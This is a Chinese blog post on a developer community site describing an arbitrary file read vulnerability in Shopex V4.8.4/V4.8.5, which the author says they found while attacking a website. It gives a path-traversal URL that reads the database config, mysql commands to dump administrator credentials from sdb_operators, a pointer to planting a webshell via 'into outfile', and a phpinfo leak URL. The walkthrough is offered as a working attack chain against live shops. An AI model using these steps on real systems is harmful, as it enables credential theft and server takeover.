Shopex V4.8.4|V4.8.5下载任意文件漏洞-阿里云开发者社区

开发者社区> 狼人2007> 正文

Shopex V4.8.4|V4.8.5下载任意文件漏洞

简介: 利用前提是程序所应用的数据库服务器而且要是可以外连的,这个很关键。 自己搞站时候遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下。 找到一个漏洞,还是发出来吧。 读取任意文件漏洞: http://www.xx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=. . /. . /config/config.php 复制代码可以连上数据库。
+关注继续查看

利用前提是程序所应用的数据库服务器而且要是可以外连的,这个很关键。

自己搞站时候遇见的站,网上找不到该版本的漏洞,自己拿回源码读了一下。

找到一个漏洞,还是发出来吧。

读取任意文件漏洞:

http://www.xx.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=. . /. . /config/config.php

复制代码可以连上数据库。

mysql -h1.1..1.1 -uuser -ppass
use yourbasename;
select * from sdb_operators;

得到管理员用户密码./shopadmin/ 登陆

后台拿shell请参照本博客《Shopex V4.8.4 V4.8.5 后台拿Shell 0Days》一文。

我测试的站,直接用into outfile 一个shell。

网上有个帖子,说可以爆物理路径,测试不可用。

如果install目录没删,下面这个可以看phpinfo

http://www.xx.com/install/svinfo.php?phpinfo=true

复制代码另外/home/cache/目录的文件,也是可以爆出来的。

版权声明:本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。

相关文章
阿里云服务器怎么设置密码?怎么停机?怎么重启服务器?
如果在创建实例时没有设置密码,或者密码丢失,您可以在控制台上重新设置实例的登录密码。本文仅描述如何在 ECS 管理控制台上修改实例登录密码。
10095 0
AMH面板伪静态Rewrite文件存放路径目录
AMH面板开启URL重写规则后,可以自定义伪静态规则,那么,AMH面板的Rewrite文件存放在哪?云吞铺子分享AMH面板伪静态Rewrite文件存放路径目录: AMH伪静态Rewrite文件存放路径 Rewrite存放文件夹:/usr/local/nginx/conf/rewrite AMH伪静态Rewrite文件是以.conf结尾的文件,AMH面板默认只有amh.conf这一个配置文件,我们可以vi自行配置伪静态规则文件(AMH主机面板伪静态规则大全),然后在Rewrite规则中启用。
754 0
使用@ContextConfiguration注解后,提示找不到配置文件
使用@ContextConfiguration注解后,提示找不到配置文件
81 0
github—如何在README.md文件中添加图片
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/qq_34173549/article/details/80551021 1、在github上的仓库建立一个存放图片的文件夹,文件夹名字随意。
2827 0
Adobe AIR对本地文件(XML文件)的操作
引用:http://addiwang.blog.163.com/blog/static/118130772011221114230288/ Air的文件操做主要涉及两个类,FIle和FileStream。
1022 0
阿里云服务器如何登录?阿里云服务器的三种登录方法
购买阿里云ECS云服务器后如何登录?场景不同,阿里云优惠总结大概有三种登录方式: 登录到ECS云服务器控制台 在ECS云服务器控制台用户可以更改密码、更换系.
13893 0
+关注
狼人2007
个人对技术的追求:代码少而精捍;思路清晰美观;可扩展好维护;技术驱动商业; 人生格言:只要你有信念,有追求,并且坚持,那你一定比随波逐流,行得远行得正...
3528
文章
0
问答
文章排行榜
最热
最新
相关电子书
更多
《2021云上架构与运维峰会演讲合集》
立即下载
《零基础CSS入门教程》
立即下载
《零基础HTML入门教程》
立即下载